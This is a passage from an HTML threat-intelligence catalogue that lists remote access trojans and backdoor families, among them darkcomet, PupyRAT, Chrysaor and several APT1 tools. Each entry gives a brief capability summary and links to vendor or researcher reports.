<h3 id="_darkcomet_2"><a class="anchor" href="#_darkcomet_2"></a><a class="link" href="#_darkcomet_2">darkcomet</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2656. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darkrat_2"><a class="anchor" href="#_darkrat_2"></a><a class="link" href="#_darkrat_2">darkrat</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2657. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gh0st_2"><a class="anchor" href="#_gh0st_2"></a><a class="link" href="#_gh0st_2">gh0st</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2658. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_greame_2"><a class="anchor" href="#_greame_2"></a><a class="link" href="#_greame_2">greame</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2659. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hawkeye_2"><a class="anchor" href="#_hawkeye_2"></a><a class="link" href="#_hawkeye_2">hawkeye</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2660. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_javadropper"><a class="anchor" href="#_javadropper"></a><a class="link" href="#_javadropper">javadropper</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2661. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lostdoor"><a class="anchor" href="#_lostdoor"></a><a class="link" href="#_lostdoor">lostdoor</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2662. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_luxnet_2"><a class="anchor" href="#_luxnet_2"></a><a class="link" href="#_luxnet_2">luxnet</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2663. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pandora_2"><a class="anchor" href="#_pandora_2"></a><a class="link" href="#_pandora_2">pandora</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2664. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_poisonivy_3"><a class="anchor" href="#_poisonivy_3"></a><a class="link" href="#_poisonivy_3">poisonivy</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2665. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_predatorpain"><a class="anchor" href="#_predatorpain"></a><a class="link" href="#_predatorpain">predatorpain</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2666. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_punisher"><a class="anchor" href="#_punisher"></a><a class="link" href="#_punisher">punisher</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2667. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_qrat"><a class="anchor" href="#_qrat"></a><a class="link" href="#_qrat">qrat</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2668. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shadowtech"><a class="anchor" href="#_shadowtech"></a><a class="link" href="#_shadowtech">shadowtech</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2669. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_smallnet"><a class="anchor" href="#_smallnet"></a><a class="link" href="#_smallnet">smallnet</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2670. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spygate_2"><a class="anchor" href="#_spygate_2"></a><a class="link" href="#_spygate_2">spygate</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2671. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_template"><a class="anchor" href="#_template"></a><a class="link" href="#_template">template</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2672. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tapaoux"><a class="anchor" href="#_tapaoux"></a><a class="link" href="#_tapaoux">tapaoux</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2673. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vantom_2"><a class="anchor" href="#_vantom_2"></a><a class="link" href="#_vantom_2">vantom</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2674. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_virusrat"><a class="anchor" href="#_virusrat"></a><a class="link" href="#_virusrat">virusrat</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2675. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xena_2"><a class="anchor" href="#_xena_2"></a><a class="link" href="#_xena_2">xena</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2676. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xtreme"><a class="anchor" href="#_xtreme"></a><a class="link" href="#_xtreme">xtreme</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2677. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darkddoser"><a class="anchor" href="#_darkddoser"></a><a class="link" href="#_darkddoser">darkddoser</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2678. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jspy_2"><a class="anchor" href="#_jspy_2"></a><a class="link" href="#_jspy_2">jspy</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2679. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xrat_2"><a class="anchor" href="#_xrat_2"></a><a class="link" href="#_xrat_2">xrat</a></h3>
<div class="paragraph">
<p>Remote Access Trojan</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2680. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/kevthehermit/RATDecoders">https://github.com/kevthehermit/RATDecoders</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pupyrat"><a class="anchor" href="#_pupyrat"></a><a class="link" href="#_pupyrat">PupyRAT</a></h3>
<div class="paragraph">
<p>Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2681. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/n1nj4sec/pupy">https://github.com/n1nj4sec/pupy</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_elf_imeij"><a class="anchor" href="#_elf_imeij"></a><a class="link" href="#_elf_imeij">ELF_IMEIJ</a></h3>
<div class="paragraph">
<p>Linux Arm malware spread via RFIs in cgi-bin scripts. This backdoor executes commands from a remote malicious user, effectively compromising the affected system. It connects to a website to send and receive information.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2682. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/elf_imeij.a">https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/elf_imeij.a</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_khrat_2"><a class="anchor" href="#_khrat_2"></a><a class="link" href="#_khrat_2">KHRAT</a></h3>
<div class="paragraph">
<p>KHRAT is a small backdoor that has three exports (functions), namely, K1, K2, and K3. K1 checks if the current user is an administrator. If not, it uninstalls itself by calling the K2 function.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2683. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor">https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_trochilus_2"><a class="anchor" href="#_trochilus_2"></a><a class="link" href="#_trochilus_2">Trochilus</a></h3>
<div class="paragraph">
<p>The Trochilus RAT is a threatening RAT (Remote Access Trojan) that may evade many anti-virus programs. The Trochilus RAT is currently being used as part of an extended threat campaign in South East Asia. The first appearance of the Trochilus RAT in this campaign, which has been active since August of 2015, was first detected in the summer of 2015. The Trochilus RAT is currently being used against civil society organizations and government computers in the South East Asia region, particularly in attacks directed towards the government of Myanmar.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2684. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.enigmasoftware.com/trochilusrat-removal/">http://www.enigmasoftware.com/trochilusrat-removal/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_moonwind_3"><a class="anchor" href="#_moonwind_3"></a><a class="link" href="#_moonwind_3">MoonWind</a></h3>
<div class="paragraph">
<p>The MoonWind sample used for this analysis was compiled with a Chinese compiler known as BlackMoon, the same compiler used for the BlackMoon banking Trojan. While a number of attributes match the BlackMoon banking Trojan, the malware is not the same. Both malware families were simply compiled using the same compiler, and it was the BlackMoon artifacts that resulted in the naming of the BlackMoon banking Trojan. But because this new sample is different from the BlackMoon banking Trojan,</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2685. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/">http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chrysaor"><a class="anchor" href="#_chrysaor"></a><a class="link" href="#_chrysaor">Chrysaor</a></h3>
<div class="paragraph">
<p>Chrysaor is spyware believed to be created by NSO Group Technologies, specializing in the creation and sale of software and infrastructure for targeted attacks. Chrysaor is believed to be related to the Pegasus spyware that was first identified on iOS and analyzed by Citizen Lab and Lookout.</p>
</div>
<div class="paragraph">
<p>Chrysaor is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Pegasus</p>
</li>
<li>
<p>Pegasus spyware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2686. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html">https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sathurbot"><a class="anchor" href="#_sathurbot"></a><a class="link" href="#_sathurbot">Sathurbot</a></h3>
<div class="paragraph">
<p>The trojan serves as a backdoor. It can be controlled remotely.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2687. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://virusradar.com/en/Win32_Sathurbot.A/description">http://virusradar.com/en/Win32_Sathurbot.A/description</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/">https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_auriga"><a class="anchor" href="#_auriga"></a><a class="link" href="#_auriga">AURIGA</a></h3>
<div class="paragraph">
<p>The AURIGA malware family shares a large amount of functionality with the BANGAT backdoor. The malware family contains functionality for keystroke logging, creating and killing processes, performing file system and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. The AURIGA malware contains a driver component which is used to inject the malware DLL into other processes. This driver can also perform process and IP connection hiding. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2688. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bangat"><a class="anchor" href="#_bangat"></a><a class="link" href="#_bangat">BANGAT</a></h3>
<div class="paragraph">
<p>The BANGAT malware family shares a large amount of functionality with the AURIGA backdoor. The malware family contains functionality for keylogging, creating and killing processes, performing filesystem and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. In addition, the malware also implements a custom VNC like protocol which sends screenshots of the desktop to the C2 server and accepts keyboard and mouse input. The malware communicates to its C2 servers using SSL, with self signed SSL certificates. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2689. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_biscuit_2"><a class="anchor" href="#_biscuit_2"></a><a class="link" href="#_biscuit_2">BISCUIT</a></h3>
<div class="paragraph">
<p>BISCUIT provides attackers with full access to an infected host. BISCUIT capabilities include launching an interactive command shell, enumerating servers on a Windows network, enumerating and manipulating process, and transferring files. BISCUIT communicates using a custom protocol, which is then encrypted using SSL. Once installed BISCUIT will attempt to beacon to its command/control servers approximately every 10 or 30 minutes. It will beacon its primary server first, followed by a secondary server. All communication is encrypted with SSL (OpenSSL 0.9.8i).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2690. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bouncer"><a class="anchor" href="#_bouncer"></a><a class="link" href="#_bouncer">BOUNCER</a></h3>
<div class="paragraph">
<p>BOUNCER will load an extracted DLL into memory, and then will call the DLL&#8217;s dump export. The dump export is called with the parameters passed via the command line to the BOUNCER executable. It requires at least two arguments, the IP and port to send the password dump information. It can accept at most five arguments, including a proxy IP, port and an x.509 key for SSL authentication. The DLL backdoor has the capability to execute arbitrary commands, collect database and server information, brute force SQL login credentials, launch arbitrary programs, create processes and threads, delete files, and redirect network traffic.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2691. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_calendar_2"><a class="anchor" href="#_calendar_2"></a><a class="link" href="#_calendar_2">CALENDAR</a></h3>
<div class="paragraph">
<p>This family of malware uses Google Calendar to retrieve commands and send results. It retrieves event feeds associated with Google Calendar, where each event contains commands from the attacker for the malware to perform. Results are posted back to the event feed. The malware authenticates with Google using the hard coded email address and passwords. The malware uses the deprecated ClientLogin authentication API from Google. The malware is registered as a service dll as a persistence mechanism. Artifacts of this may be found in the registry.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2692. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_combos"><a class="anchor" href="#_combos"></a><a class="link" href="#_combos">COMBOS</a></h3>
<div class="paragraph">
<p>The COMBOS malware family is an HTTP based backdoor. The backdoor is capable of file upload, file download, spawning a interactive reverse shell, and terminating its own process. The backdoor may decrypt stored Internet Explorer credentials from the local system and transmit the credentials to the C2 server. The COMBOS malware family does not have any persistence mechanisms built into itself.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2693. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cookiebag"><a class="anchor" href="#_cookiebag"></a><a class="link" href="#_cookiebag">COOKIEBAG</a></h3>
<div class="paragraph">
<p>his family of malware is a backdoor capable of file upload and download as well as providing remote interactive shell access to the compromised machine. Communication with the Command &amp; Control (C2) servers uses a combination of single-byte XOR and Base64 encoded data in the Cookie and Set-Cookie HTTP header fields. Communication with the C2 servers is over port 80. Some variants install a registry key as means of a persistence mechanism. The hardcoded strings cited include a string of a command in common with several other APT1 families.</p>
</div>
<div class="paragraph">
<p>COOKIEBAG is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TROJAN.COOKIES</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2694. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
